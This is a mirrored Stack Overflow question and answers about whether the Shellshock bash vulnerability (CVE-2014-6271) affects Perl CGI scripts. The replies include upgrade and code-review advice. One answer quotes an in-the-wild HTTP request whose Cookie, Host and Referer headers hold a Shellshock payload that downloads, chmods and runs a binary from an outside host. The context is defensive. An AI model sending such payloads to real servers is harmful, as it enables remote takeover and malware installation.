The bash vulnerability CVE-2014-6271 . Can it affect my CGI perl scripts? How to understand this?

a 夏天 提交于 2019-12-22 01:40:49

问题


Yesterday the problem CVE-2014-6271 was reported which is the BASH Shellshock vulnerability. I am trying to understand if it can affect my server via my Perl CGI scripts.

Can my code be affected in a malicious way - what would my code need to do to be affected? What should I check to verify this?


回答1:


Yes it affects Perl if your CGI script spawns subshells, e.g., using the system() or open() functions or backticks. See this excellent Red Hat blog post. Note that the blog post is not Red Hat specific in any significant way.

Check your Perl CGI scripts for these functions, BUT FIRST UPGRADE BASH TO A FIXED VERSION!




回答2:


You could try to set special crafted strings to the HTTP server als Referrer, Cookie, Host or Accept header which are then passed to (bash) CGI scripts:

GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh; .Host:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh; .Referer:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh; .Accept:./

See https://gist.github.com/anonymous/929d622f3b36b00c0be1 as a real world example of malware which was seen in the wild.

If your Perl scripts do not call bash (by using system or open) you should be safe.

See https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/



来源:https://stackoverflow.com/questions/26038053/the-bash-vulnerability-cve-2014-6271-can-it-affect-my-cgi-perl-scripts-how-to

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!